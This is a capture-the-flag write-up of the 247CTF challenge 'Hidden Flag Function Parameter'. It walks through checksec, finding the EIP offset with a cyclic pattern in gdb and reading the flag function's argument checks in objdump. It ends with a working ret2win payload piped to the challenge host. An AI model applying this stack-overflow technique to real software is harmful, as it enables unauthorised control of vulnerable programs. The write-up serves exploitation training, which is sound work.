Hidden Flag Function Parameter (pwn)

PUBLISHED ON 22/03/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC

Intro

This is my write-up of a Pwnable challenge Hidden Flag Function Parameter on the CTF site 247CTF.com.

Instructions

Can you control this application's flow to gain access to the hidden flag function with the correct parameters?

Howto

This one is very similar to Hidden Flag Function, but as we can see in the instructions, we also have to pass the right parameters to get the flag.

I found a lot of good stuff here.

kali@kali:~$ checksec hidden_flag_function_with_args
[*] '/home/kali/hidden_flag_function_with_args'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

We can see that this is a 32-bit little-endian binary with NX enabled, no PIE and no stack canary. That combination already tells us the plan: NX means we can't run shellcode from the stack, but with no canary an overflow can overwrite the saved return address unnoticed, and with no PIE the address of the flag function is fixed, so we can return straight into it (a classic ret2win).

Let's create a cyclic pattern, so that the value which ends up in EIP tells us exactly how far into the input the saved return address sits:

kali@kali:~$ msf-pattern_create -l 300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9

Run the binary under gdb (I recommend installing gef) and paste the pattern from the previous step as the input:

kali@kali:~$ gdb -q ./hidden_flag_function_with_args
GEF for linux ready, type `gef' to start, `gef config' to configure
75 commands loaded for GDB 9.1 using Python engine 3.8
[*] 5 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./hidden_flag_function_with_args...
(No debugging symbols found in ./hidden_flag_function_with_args)
gef➤  r
Starting program: /home/kali/hidden_flag_function_with_args
Sorry, no flag here!
You can ask for one though:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax   : 0x1
$ebx   : 0x41346541 ("Ae4A"?)
$ecx   : 0x0
$edx   : 0xf7fb601c  →  0x00000000
$esp   : 0xffffd4c0  →  "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"
$ebp   : 0x65413565 ("e5Ae"?)
$esi   : 0xf7fb4000  →  0x001d6d6c
$edi   : 0xf7fb4000  →  0x001d6d6c
$eip   : 0x37654136 ("6Ae7"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd4c0│+0x0000: "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"	 ← $esp
0xffffd4c4│+0x0004: "e9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5[...]"
0xffffd4c8│+0x0008: "0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A[...]"
0xffffd4cc│+0x000c: "Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag[...]"
0xffffd4d0│+0x0010: "f3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9[...]"
0xffffd4d4│+0x0014: "4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0A[...]"
0xffffd4d8│+0x0018: "Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah[...]"
0xffffd4dc│+0x001c: "f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x37654136
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hidden_flag_fun", stopped 0x37654136 in ?? (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

The program crashes with EIP = 0x37654136, which is the little-endian encoding of the bytes "6Ae7" from our pattern, so we use msf-pattern_offset to turn that value into an offset:

kali@kali:~$ msf-pattern_offset -q 0x37654136
[*] Exact match at offset 140

Now let's look at the objdump of the binary. We are searching for cmp instructions in the flag function, since we know from the challenge text that some parameter conditions have to be met:

kali@kali:~$ objdump -drwC -Mintel -d hidden_flag_function_with_args
...
08048576 <flag>:
 8048576:	55                   	push   ebp
 8048577:	89 e5                	mov    ebp,esp
 8048579:	53                   	push   ebx
 804857a:	81 ec 94 00 00 00    	sub    esp,0x94
 8048580:	e8 2b ff ff ff       	call   80484b0 <__x86.get_pc_thunk.bx>
 8048585:	81 c3 7b 1a 00 00    	add    ebx,0x1a7b
 804858b:	81 7d 08 37 13 00 00 	cmp    DWORD PTR [ebp+0x8],0x1337
 8048592:	75 63                	jne    80485f7 <flag+0x81>
 8048594:	81 7d 0c 47 02 00 00 	cmp    DWORD PTR [ebp+0xc],0x247
 804859b:	75 5a                	jne    80485f7 <flag+0x81>
 804859d:	81 7d 10 78 56 34 12 	cmp    DWORD PTR [ebp+0x10],0x12345678
 80485a4:	75 51                	jne    80485f7 <flag+0x81>
...

So flag checks its three arguments at [ebp+0x8], [ebp+0xc] and [ebp+0x10] against 0x1337, 0x247 and 0x12345678. Because this is a 32-bit cdecl binary, arguments are passed on the stack: after flag's prologue (push ebp; mov ebp,esp) the first argument sits right above the saved EBP and the return address. When we overwrite the saved return address with the address of flag, the ret instruction pops it and leaves ESP pointing at the next 4 bytes of our input, which flag will treat as its own return address. The payload therefore is: 140 bytes of padding, the address of flag (0x08048576), 4 bytes of fake return address (flag will crash when it returns there, but by then the flag has already been printed), and then the three arguments 0x1337, 0x247 and 0x12345678, each as a 32-bit little-endian value.

kali@kali:~$ python2 -c "from pwn import *; print 'a'*140 + p32(0x08048576) + 'PPPP' + p32(0x1337) + p32(0x247) + p32(0x12345678)" | nc a1b6b58043ec4527.247ctf.com 50284
Sorry, no flag here!
You can ask for one though:
How did you get here?
Have a flag!
247CTF{xxxx}
